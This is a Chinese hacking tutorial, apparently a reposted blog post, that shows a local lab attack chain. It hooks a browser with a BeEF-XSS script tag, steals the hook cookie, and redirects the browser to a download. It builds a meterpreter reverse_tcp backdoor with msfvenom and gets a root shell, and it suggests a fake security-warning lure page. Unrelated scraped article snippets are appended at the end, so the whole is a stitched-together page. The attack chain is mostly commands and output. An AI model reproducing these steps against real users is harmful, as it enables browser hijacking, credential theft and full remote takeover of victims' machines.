本机是Ubuntu系统 所以我们直接本机实战好了 大晚上的 睡不着 写篇文章在睡
先来讲一下劫持浏览器
劫持浏览器用到的工具为beef-xss
在Ubuntu中 如果你想安装的话 直接吧kali源添加进去后
apt-get install beef-xss //安装
打开的话 直接beef-xss
如下图
root@xaiSec:/home/hacker# beef-xss Please wait as BeEF services are started. You might need to refresh your browser once it opens. UI URL: [url]http://127.0.0.1:3000/ui/panel[/url] Hook: <script src="http://<IP>:3000/hook.js"></script> Example: <script src="http://127.0.0.1:3000/hook.js"></script>
然后他会自动弹出一个网站http://127.0.0.1:3000/ui/authentication
网站是beef-xss平台 就相当于xss平台一样 用于接收cookie等信息的
<script src=”http://<IP>:3000/hook.js”></script> ip改成我们本机在内网中的ip即可
ifconfig 查看
192.168.0.3
那么 xss在内网中的链接为 192.168.0.3:3000/hook.js
打开看一下 会看到一些代码 这里我们不用管他
直接吧xss代码加入到html里面
当然也可以配合dns欺骗 和xerosploit的话会达到更好的效果 这里就不演示了
接着我们来打开test.html一下
test.html 里面有我们的xss代码
如下图
这个时候我们的beef-xss平台以及提示上线
双击192.168.0.3
因为我们这是本机测试的
双击后就会看到我们的浏览器版本信息 客户端信息等
表单如下
Browser Version: UNKNOWN
Initialization
Browser UA String: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0
Initialization
Browser Language: zh-CN
Initialization
Browser Platform: Linux x86_64
Initialization
Browser Plugins: IcedTea-Web Plugin (using IcedTea-Web 1.6.2 (1.6.2-3.1ubuntu3)),Shockwave Flash
Initialization
Window Size: Width: 1153, Height: 557
Initialization
Category: Browser Components (12 Items)
Flash: Yes
Initialization
VBScript: No
Initialization
PhoneGap: No
Initialization
Google Gears: No
Initialization
Web Sockets: Yes
Initialization
QuickTime: No
Initialization
RealPlayer: No
Initialization
Windows Media Player: No
Initialization
WebRTC: Yes
Initialization
ActiveX: No
Initialization
Session Cookies: Yes
Initialization
Persistent Cookies: Yes
Initialization
Category: Hooked Page (5 Items)
Page Title: Unknown
Initialization
Page URI: file:///home/hacker/%E6%A1%8C%E9%9D%A2/test.html
Initialization
Page Referrer: Unknown
Initialization
Host Name/IP: Unknown
Initialization
Cookies: BEEFHOOK=XDgHwC9lEBbzAkrJILOWQICmyuE82OKNoYCSwbFBQ4OnPmhe3NFKYB1MP84JdjQh1pWug40sEl8JeYyl
Initialization
Category: Host (8 Items)
Host Name/IP: 192.168.0.3
Initialization
Date: Tue Mar 14 2017 04:32:22 GMT+0800 (CST)
Initialization
Operating System: Linux
Initialization
Hardware: Laptop
Initialization
CPU: x86_64
Initialization
Default Browser: Unknown
Initialization
Screen Size: Width: 1366, Height: 768, Colour Depth: 24
Initialization
[backcolor=rgb(223, 232, 246) !important]
Touch Screen: No
Initialization
我们来让他跳转一下
当然 如果目标是xp或者Windows7(没打补丁的Windows7)的话 会直接劫持 ps:msf生成恶意地址 beef-xss劫持
如果我们让他跳转到 http://bbs.ichunqiu.com/
点击commands
Browser (53) Hooked Domain (25) Redirect Browser
当然也有很多模块需要各种自己去测试 比如 盗取cookie
data: cookie=BEEFHOOK=XDgHwC9lEBbzAkrJILOWQICmyuE82OKNoYCSwbFBQ4OnPmhe3NFKYB1MP84JdjQh1pWug40sEl8JeYyl
继续来演示跳转
Redirect URL: 后面设置我们要跳转到的网站上
Execute //执行
这个时候你会发现我们的火狐浏览器已经成功跳转到了i春秋论坛
同样的原理
我们msf生成一个Linux后门
然后放到/var/www/html下
网址为:192.168.0.3/
Metasploit 生成后门
msfVENOM -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.3 lport=4444 -f elf -o test222
root@xaiSec:/home/hacker# msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.3 lport=4444 -f elf -o test222
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 71 bytes
Final size of elf file: 155 bytes
Saved as: test222
root@xaiSec:/home/hacker#
赋予执行权限
root@xaiSec:/home/hacker# chmod +x ./test222
root@xaiSec:/home/hacker#
配置Metasploit
root@xaiSec:~# msfconsole
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v4.14.1-dev-f02c323c7ed3ad6b5769691e03aefd1b45a36fbf]
+ -- --=[ 1628 exploits - 927 auxiliary - 282 post ]
+ -- --=[ 472 payloads - 39 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: [url]http://r-7.co/trymsp[/url] ]
msf > use exploit/multi/handler
msf exploit(handler) > set lhost 192.168.0.3
lhost => 192.168.0.3
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > run
[*] Started reverse TCP handler on 192.168.0.3:4444
[*] Starting the payload handler...
接着我们把后门复制到/var/www/html下
cp test222 /var/www/html/
root@xaiSec:/home/hacker# cp test222 /var/www/html/
root@xaiSec:/home/hacker# cd /var/www/html
root@xaiSec:/var/www/html# ls
index.html index.lighttpd.html test222 test222.html
root@xaiSec:/var/www/html#
从而打开192.168.0.3/test222
下载后门 //
接着我们让beef-xss 劫持浏览器跳转到 192.168.0.3/test222
可以自己写一个html 大致内容就是 你的系统安全问题 xxxxxx Ps:原谅我语文不好 = =
劫持如下
我们发现已经跳转过来了
然后下载 自己运行下后门测试
……………………………………………………….. 此处省略n个字
运行后我们发现msf上线了
root@xaiSec:/var/www/html# ./test222
shell一下 然后回车
我们会看到已经拿到了这样一个权限
尝试执行下 ifconfig
成功执行
route //获取路由表信息
我们拿到了终端权限
接着Ctrl+c 退出shell终端
返回到meterpreter > help //查看帮助
系统命令 以下是经过谷歌翻译↓
核心命令
=============
命令说明
------- -----------
?帮助菜单
背景背景当前会话
bgkill杀死一个背景meterpreter脚本
bglist列出运行的后台脚本
bgrun执行meterpreter脚本作为后台线程
channel显示信息或控制活动通道
close关闭通道
disable_unicode_encoding禁用unicode字符串的编码
enable_unicode_encoding启用Unicode字符串的编码
exit终止meterpreter会话
get_timeouts获取当前会话超时值
帮助菜单
info显示有关Post模块的信息
irb进入irb脚本模式
load加载一个或多个meterpreter扩展
machine_id获取连接到会话的计算机的MSF ID
migrate将服务器迁移到另一个进程
quit终止meterpreter会话
读取从通道读取数据
resource运行存储在文件中的命令
run执行meterpreter脚本或Post模块
会话快速切换到另一个会话
set_timeouts设置当前会话超时值
睡眠强制Meterpreter去安静,然后重新建立会话。
transport更改当前的传输机制
使用“load”的已弃用别名
uuid获取当前会话的UUID
write将数据写入通道
Stdapi:文件系统命令
============================
命令说明
------- -----------
cat将文件的内容读取到屏幕
cd更改目录
checksum检索文件的校验和
cp将源复制到目标
dir列表文件(ls的别名)
下载下载文件或目录
编辑编辑文件
getlwd打印本地工作目录
getwd打印工作目录
lcd更改本地工作目录
lpwd打印本地工作目录
ls列表文件
mkdir创建目录
mv将源移动到目标
pwd打印工作目录
rm删除指定的文件
rmdir删除目录
upload上传文件或目录
Stdapi:网络命令
=========================
命令说明
------- -----------
arp显示主机ARP缓存
ifconfig显示接口
ipconfig显示接口
netstat显示网络连接
portfwd将本地端口转发到远程服务
route查看和修改路由表
Stdapi:系统命令
=====================
命令说明
------- -----------
execute执行命令
getenv获取一个或多个环境变量值
getpid获取当前进程标识符
getprivs尝试启用当前进程可用的所有特权
getuid获取服务器正在运行的用户
kill终止进程
localtime显示目标系统的本地日期和时间
ps列出正在运行的进程
rev2self在远程机器上调用RevertToSelf()
shell放入系统命令shell
suspend挂起或恢复进程列表
sysinfo获取有关远程系统(如操作系统)的信息
ps //查看进程
getuid // 获取服务器正在运行的用户
sysinfo // 查看目标机系统信息,如机器名,操作系统等
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
meterpreter > sysinfo
Computer : xaiSec
OS : Linux xaiSec 4.10.0-11-generic #13-Ubuntu SMP Wed Mar 1 21:27:28 UTC 2017 (x86_64)
Architecture : x64
Meterpreter : x86/linux
meterpreter >
还有很多好玩的 需要大家自己去测试 mdzz 睡觉了 大晚上的 给你们写这篇文章 各位大佬给点好评呗
结束语:勿忘初心 方得始终.
原文地址:https://my.oschina.net/ichunqiu/blog/860704
文章浏览阅读429次。报错信息如下:[Code: 1093, SQL State: HY000] You can’t specify target table ‘bd_bankaccbas’ for update in FROM clause译文:不能在FROM子句中指定目标表‘bd_bankaccbas’进行更新。有问题的SQL语句如下,它在oracle数据库的语法是支持的,但是mysql就不支持直接这么写:from和update都是同一张表。<span style="col..._you can't specify target table 't_bill' for update in from clause
文章浏览阅读421次。为什么80%的码农都做不了架构师?>>> ..._@jmslistener rabitmq
文章浏览阅读414次。转载:https://mp.weixin.qq.com/s/VQb_mAFbStQXurtByBa0oQ_测试版cpu是怎么流出的?
文章浏览阅读1.5w次,点赞91次,收藏384次。Nginx - 学相伴分享人:秦疆(遇见狂神说)公司产品出现瓶颈?我们公司项目刚刚上线的时候,并发量小,用户使用的少,所以在低并发的情况下,一个jar包启动应用就够了,然后内部tomcat返回内容给用户。但是慢慢的,使用我们平台的用户越来越多了,并发量慢慢增大了,这时候一台服务器满足不了我们的需求了。于是我们横向扩展,又增加了服务器。这个时候几个项目启动在不同的服务器上,用户要访问,就需要增加一个代理服务器了,通过代理服务器来帮我们转发和处理请求。我们希望这个代理服务器可以帮助我们接_遇见狂神说 nginx
文章浏览阅读474次。一种基于北斗的低功耗双向非实时通信方法【技术领域】[0001]本发明涉及一种基于北斗的低功耗双向非实时通信方法,属于北斗系统通信技术领域。【背景技术】[0002]北斗卫星系统具备的短报文通信功能在水文、气象、海洋、林业领域的遥测系统已经广泛应用。但鉴于目前北斗通讯终端的功耗较大,发信频度受限的问题,这些遥测系统在应用北斗卫星作为数据传输载体时,一般只实现了野外遥测站向数据采集中心站的单向传输功能,..._北斗双向通信
文章浏览阅读981次,点赞2次,收藏2次。windows域名映射_windows域名映射文件
文章浏览阅读171次。1 安装在官网下载对应版本, 如果要破解,请找到破解用 charles.jar(charles用java写的),替换掉安装目录中 jar 文件2 取得管理权限下载证书pc移动端证书help -> proxy ssl -> 选择对应的选项,安装好选项,授权永久信任,再输入当前用户密,最后输入 grant 用户权限密码(如果自己的电脑无需)3 使用charles 配置..._macbook charles method connection
文章浏览阅读7.3k次,点赞30次,收藏133次。2023最新Android Studio安装、卸载、解决c盘占用教程,从安装到hello world运行_build configuration language
文章浏览阅读245次。摘要:这项工作解决了一个具有挑战性的问题,即从单目视频中估计完整的三维人体形状和姿态。由于现实世界的三维网格标记数据集有限,目前大多数的三维人体形状重建方法只关注单一的RGB图像,丢失了所有的时间信息。与此相反,我们提出了一种临时细化的图形网,包括图像级模块和视频级模块,来解决这一问题。imagelevel模块是用于从图像中进行人体形状和姿态估计的图U-Nets,其中图卷积神经网络(Graph CNN)有助于相邻顶点的信息交流,U-Nets架构扩大了每个顶点的接受域,融合了高层和低层特征。videolev_temporally refined graph u-nets for human shape and pose estimation from mon
文章浏览阅读2.0k次。注意:Oracle安装不能用root用户安装,必须新建用户安装1、 sqlplus命令不识别问题(bash :sqlplus command not found)当你首次安装oracle后,也许会出现这种情况,第一次或许有点棘手,不知道如何改怎么办。这时不用着急,想想Linux里面的命令是如何运行的,如adduser等,我们发现是因为在/bin/文件夹下有这样的一个文件adduser,于是我们也想..._ubuntu中oracle提示sqlpus: command not found
文章浏览阅读2.6k次。elasticsearch-setup-passwords interactive[root@node-zwf ~]# su elasticsearch[elasticsearch@node-zwf root]$ cd /home/elasticsearch/elasticsearch-7.8.0/[elasticsearch@node-zwf elasticsearch-7.8.0]$ elasticsearch-setup-passwords interactiveba..._bash: elasticsearch-setup-passwords: command not found
文章浏览阅读922次。第一条为了进一步加强学校涉密计算机和涉密移动存储介质(移动硬盘、U盘、软盘、光盘、存储卡等)的安全保密工作,维护国家安全和利益,维护学校稳定和发展,结合我校工作实际,特制定本规定。第二条学校保密委员会负责全校涉密计算机、移动存储介质保密管理的指导、协调和监督工作。保密技术防范和管理工作由学校网络中心负责。第三条涉密计算机的日常管理制度(一)涉密计算机不得直接或间接接入国际互联网、校园网和其他公共信..._大学 涉密计算机安全保密策略